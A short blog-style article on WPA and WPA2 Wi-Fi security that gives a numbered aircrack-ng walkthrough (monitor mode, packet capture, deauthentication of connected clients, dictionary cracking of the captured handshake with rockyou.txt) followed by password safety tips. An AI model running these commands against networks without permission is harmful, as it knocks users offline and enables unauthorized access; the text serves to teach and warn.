WPA2 it’s based on the new 802.11i standard. WPA, as a previous version, which could be considered "migration", doesn’t include all the features of IEEE 802.11i, WPA2 we can deduce that it is the certified version of the 802.11i standard. The 802.11i standard was ratified in June 2004. The Wi-Fi Alliance calls the pre-shared key version WPA-Personal and WPA2-Personal and the version with 802.1x / EAP authentication as WPA-Enterprise and WPA2-Enterprise.
The manufacturers start to produce the new generation of access points supported by the WPA2 protocol that uses the AES (Advanced Encryption Standard) encryption algorithm. With this algorithm it will be satisfy the US government security requirements - FIPS140-2. "WPA2 is ideally designed for both, the private and public sector enterprises. Products that are certified for WPA2 give IT managers the security that the technology meets interoperability standards," said Frank Hazlik Managing Director of Wi-Fi Alliance. Some of the organizations are waiting for this new generation of AES-based products, it is important to stand out that WPA-certified products remain secure according to the 802.11i standard.
Nowadays it is the most used in home, the only "failure" is that you can remove the handshake and remove the password offline by testing and failure with dictionaries.
The goal for getting a WPA or WPA2 password is to capture the handshake that result when a user connects to the Wi-Fi network.
1.) We look at the interface that has our network card to put it in monitor mode
2.) We put the network card in monitor mode to be able to capture all the wifi packets that circulate through the air
- Airmon-ng start wlan0
3.) We select the wifi network that we want to audit and we capture only the packages directed to that network
- Airodump-ng -c <CANALAP> --bssid <BSSID> -w package_capture file wlan0mon
4.) We need to wait for clients to be connected to that network in order to capture the handshake. When it’s happens we are going to launch deauthentication packages to get them out of the network and be able to capture the handshake just when they connect.
- Aireplay-ng -0 15 -a <BSSID> wlan0mon
5.) Once captured the handshake we proceed to crack it by brute force with a fairly common dictionary 'rockyou.txt'.
- Aircrack-ng file_capture-01.cap -w /usr/share/wordlists/rockyou.txt
How to stay safe against these attacks
The main security failures of this encryption are the own people, here are some tips to follow to choose a password:
- Never leave the password by default.
- Try to use uppercase, lowercase letters, numbers and special characters.
- Do not use words or phrases known or close to you as a password.
- Do not write in a post it the password and paste it to the router.
- Do not leave the name of the router by default or they will easily know the type of router.
If you put phrases or familiar words they will get easily your password with rock you type dictionaries.